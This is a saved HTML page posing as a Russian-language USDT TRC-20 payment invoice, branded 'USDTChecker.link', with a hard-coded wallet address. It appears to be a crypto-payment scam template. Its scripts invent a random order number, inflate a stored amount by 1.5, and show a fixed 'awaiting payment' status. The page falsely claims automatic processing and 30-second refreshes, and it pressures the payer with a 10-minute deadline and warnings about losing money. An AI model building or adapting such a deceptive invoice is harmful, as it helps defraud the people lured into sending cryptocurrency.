<!DOCTYPE html>

<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-DJRTPRCHHL"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-DJRTPRCHHL');
</script>
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>USDT ORDER</title>
		<link rel="stylesheet" href="./USDT ORDER_files/bootstrap.css">
		<link rel="stylesheet" href="./USDT ORDER_files/style.css">
		<link rel="stylesheet" href="./USDT ORDER_files/responsive.css">
		
		<script src="./USDT ORDER_files/jq.js.Без названия"></script>
		<script src="./USDT ORDER_files/jquery-ui.js.Без названия"></script>
		<!-- <script src="/assets/js/app.js?with_cart=48"></script> -->
		<script src="./USDT ORDER_files/bootstrap.min.js.Без названия"></script>
		<script src="./USDT ORDER_files/Clip.js.Без названия"></script> 

		<link href="./USDT ORDER_files/jquery.toastmessage.css" rel="stylesheet" media="screen"> 

		  


		<link href="./USDT ORDER_files/styles.css" rel="stylesheet">
		<style>
			body {
			padding-top: 70px;
			/* Required padding for .navbar-fixed-top. Remove if using .navbar-static-top. Change if height of navigation changes. */
			} 

               h1.badge.alert-danger
               {
                     background: #d9534f !important;
    color: white!important;
    font-size: 20px;
               }

			span.badge.alert-danger  {
    background: #d9534f !important;
    color: white!important;
}
			.panel-body {
    color: black;
}



		</style>
	</head>
	<body>
		<div class="container">
			<div class="row">
				<!-- <div class="col-md-4 col-md-offset-4"><img class=" img-responsive text-center" src="https://i.imgur.com/l0fIcvD.png"></a> </div> -->
				<div class="col-lg-12 text-center  row-box">	
					<div class="panel panel-default">
						
						

							<div class="panel-body">
								

							<div class="page-wrapper">
  <link rel="stylesheet" href="./USDT ORDER_files/font-awesome.min.css">
			<div class="page-content">


				<div class="row">
					<div class="col-md-12 grid-margin stretch-card">
						<div class="card">
							<div class="card-body d-flex justify-content-center">
								<div class="abf-frame col-md-12 ">

								
  <div class="abf-header">
    <div>
       <a target="_blank" href="https://usdtchecker.link/"><div class="abf-ash1"><img title="Работает через usdtchecker.link" src="./USDT ORDER_files/Pdv2CGM.png" width="200" alt=""></div></a>
    </div>
    <div style="text-align: center; background-color:#fff;"><span class="abf-qr"> <img class="abf-img-height" src="./USDT ORDER_files/chart" style="display: inline;" alt="QR code for payment"> </span> </div>
  </div>
  <div class="abf-form">
    <div class="abf-ash1"> Отправьте  <strong><span class="abf-totalbtc copyfund" id="copyfund" data-clipboarder-target="#copyfund" data-clipboard-target="copyfund"><script>
// Отримуємо значення з локального сховища
var data = localStorage.getItem('myData');

// Виводимо значення на сторінку
var resultElement = document.getElementById('copyfund');
resultElement.innerHTML = data * 1.5;
</script></span></strong> USDT TRC-20
      на адрес: </div>
    <div class="abf-address abf-topline abf-ash2 abf-input-address copybill" id="copybill" data-clipboarder-target="#copybill" data-clipboard-target="copybill">TKhMrJGwV5aDdhUVskrWEe7r44Wug6o7py</div>
    <div class="abf-data abf-topline">
      <div class="abf-list">
      	 <div class="abf-list-item">
          <div class="abf-label"> Заказ #:</div>
          <div class="abf-value" id="order_id"><script>
var randomNumber = Math.floor(Math.random() * 90000000) + 10000000; // Генерація випадкового восьмизначного числа

var orderElement = document.getElementById('order_id');
orderElement.innerHTML = randomNumber;
</script></div>
        </div>

        <div class="abf-list-item">
          <div class="abf-label">Merchant:</div>
          <div class="abf-value"><a href="https://usdtchecker.link/">USDTChecker.link</a></div>
        </div>
        <div class="abf-list-item">
          <div class="abf-label">Сумма к оплате:</div>
          <div class="abf-value"><span class="abf-totalbtc" id="abf-totalbtc">
		  <script>
// Отримуємо значення з локального сховища
var data = localStorage.getItem('myData');

// Виводимо значення на сторінку
var resultElement = document.getElementById('abf-totalbtc');
resultElement.innerHTML = data * 1.5;
</script></span> USDT</div>
        </div>
        <div class="abf-list-item">
          <div class="abf-label">Комиссия:</div>
          <div class="abf-value"><span class="abf-arrived">0</span> %</div>
        </div>
 
        <div class="abf-list-item">
          <div class="abf-label">Дата:</div>
          <div class="abf-value" id="abf-value">
		  <script>// create a new `Date` object
var today = new Date();


var now = today.toLocaleString();
var date_value = document.getElementById('abf-value').innerHTML = now;

</script>
</div>
        </div>
  
        <div class="abf-list-item">
          <div class="abf-label">Статус:</div>
          <div class="abf-value"><b><span class="abf-status">Ожидаем платёж</span></b></div>
        </div>
      </div>
    </div>

       <div class="alert alert-warning" role="alert">
    	Если будет отправлена сумма больше ИЛИ меньше той что указано на странице, система не увидит платёж, а значит Вы не получите свой заказ и в последствии можете потерять свои деньги!    </div>

    <div class="alert alert-success" role="alert">Платеж будет автоматически обработан системой.
Обновление страницы происходит каждые 30 секнуд    	
    </div>
    <hr>
     <div class="alert alert-danger" role="alert">
    	<b>ВНИМАНИЕ!</b><br> Оплатить счёт необходимо в течение 10 минут отправив точную сумму на указанный кошелек.<p>    </p></div>
    <hr>
  	
  	 

  </div>
</div>
							</div>
						</div>
					</div>
				</div>


			


			</div>


		</div>


								
							</div>
						
							<!-- <meta refr -->
								<div class="panel-footer">
									<a class="btn btn-block btn-lg btn-danger" target="_blank" href="https://alicefarm.store/">На главную</a>
								</div>
					</div>
				</div>
			</div>
		</div>
	




<style>
.abf-frame p {
	font-family: Helvetica!important;
	line-height: 18px;
	margin: 0!important;
	padding: 0!important
}
.abf-frame {
	color: #000!important;
	background-color: #fff!important;
	/*position: absolute;*/
	top: calc(50% - 245px);
	left: calc(50% - 180px);
	font-family: Helvetica!important;
	width: 360px;
	/*max-height: 600px;*/
	margin-top: 0;
	text-align: left;
	box-shadow: 0 12px 28px rgba(0,0,0,0.1);
	border-radius: 3px;
	font-size: 12px
}
.abf-frame a {
	font-family: Helvetica!important;
	color: #6A8FC2!important
}
.abf-frame a:hover {
	color: #676573!important
}
/*.abf-form {
	padding: 0 24px 24px
}*/
.abf-header {
	display: flex;
	flex-direction: row;
	justify-content: space-between;
	align-items: center;
	padding: 5px 24px;
	min-height: 93px
}
.abf-header div:nth-child(1) img {
	display: inline-block;
	margin: 5px 0
}
.abf-ash1 {
	text-align: center;
	font-size: 14px;
	margin: 12px 0
}
.abf-ash2 {
	font-size: 14px;
	text-align: center;
	margin: 12px 0;
	font-weight: 700
}
.abf-topline {
	border-top: 1px solid #dedede!important;
	padding-top: 12px
}
.abf-list-item {
	padding: 4px 0;
	display: flex;
	align-items: baseline
}
.abf-label {
	display: inline-block;
	width: 45%;
	padding-right: 24px;
	box-sizing: border-box;
	vertical-align: top;
	font-size: 12px;
	opacity: .5;
	text-align: right
}
.abf-value {
	display: inline-block;
	width: 48%;
	box-sizing: border-box
}
.abf-confirmations {
	display: inline-block;
	background-color: #dc3545!important;
	width: 12px;
	height: 12px;
	font-size: 9px;
	line-height: 12px;
	text-align: center;
	color: #fff!important;
	border-radius: 50%;
	margin-left: 3px
}
.abf-green {
	background-color: #28a745!important
}
.abf-img-height {
	max-height: 110px
}
</style>

</body></html>